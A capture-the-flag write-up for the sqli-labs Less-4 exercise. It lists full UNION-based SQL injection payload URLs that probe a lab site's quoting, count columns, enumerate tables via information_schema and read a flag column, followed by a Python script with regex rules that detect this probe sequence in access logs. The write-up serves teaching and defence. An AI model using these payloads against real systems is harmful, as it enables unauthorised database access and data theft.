Less-4
Less-4 GET - Error based - Double Quotes - String (error-based GET injection, double-quoted string type)
1. Check whether an injection point exists
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3' --+
Normal response
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" --+
Error response => an injection point exists
2. Determine the parameter type
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3 and 1=2 --+
Normal response => string-type injection (a numeric parameter would have failed the `and 1=2` test)
3. Close the parameter's quoting
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=2 --+
Error response
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3" and 1=1 --+
Error response => closing with `"` alone is not the right closure (both `and 1=1` and `and 1=2` error)
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") and 1=1 --+
Normal response => closure successful (the value is wrapped as `("…")`)
4. Find how many columns the queried table has
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 3 --+
Normal response
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=3") order by 4 --+
Error response => the table has 3 columns
5. List the tables in the current database
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
6. List the columns of the NCdmJewX table
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="NCdmJewX" --+
7. Read the data in the flag column of that table
https://636-dd4ed29a-1336-42bc-8387-afa3c0ffc849.do-not-trust.hacking.run/?id=-3") union select 1,2,group_concat(flag) from NCdmJewX --+
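From the defender's side, the seven steps above leave a recognisable trail in the web server access log: a quote followed by a comment, `and 1=1`/`and 1=2`, `order by N`, then `union select` against `information_schema`. The Python below is an added example (not part of the original writeup) that tags each of those request shapes in constructed Apache-style log lines; the log lines and the 198.51.100.7 address are made up, and the rules only cover the payload forms shown on this page.

```python
"""Flag the Less-4 probe sequence (quote test, boolean test, ORDER BY, UNION) in access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style lines replaying the writeup's requests; not a real capture.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=3 HTTP/1.1" 200 612
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=3%27%20--+ HTTP/1.1" 200 612
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=3%22%20--+ HTTP/1.1" 200 540
198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=3%22)%20order%20by%204%20--+ HTTP/1.1" 200 540
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=-3%22)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 700
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# One rule per step of the writeup; patterns run on the URL-decoded parameter value.
RULES = [
    ("quote_probe", re.compile(r"""['"]\s*(?:--|#)""")),                  # step 1
    ("boolean_test", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),  # steps 2-3
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),          # step 4
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)), # steps 5-7
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),         # steps 5-6
]

def classify(value):
    """Return the rule names matching one decoded parameter value, in RULES order."""
    return [name for name, pat in RULES if pat.search(value)]

def scan_log(text):
    """Parse each access-log line and tag its query string; unparsable lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        # parse_qs already decodes %xx and turns '+' into a space, so '--+' becomes '-- '
        joined = " ".join(v for values in params.values() for v in values)
        findings.append({"ip": m["ip"], "target": m["target"], "tags": classify(joined)})
    return findings

def suspicious_sources(findings, min_hits=2):
    """IPs with at least min_hits tagged requests: one stray quote is noise, the sequence is not."""
    hits = {}
    for f in findings:
        if f["tags"]:
            hits[f["ip"]] = hits.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in hits.items() if n >= min_hits)
```

Note that the single-quote probe in step 1 also gets tagged even though the application answered it normally; the point of `suspicious_sources` is that the full sequence from one client, not any single request, is what merits a look.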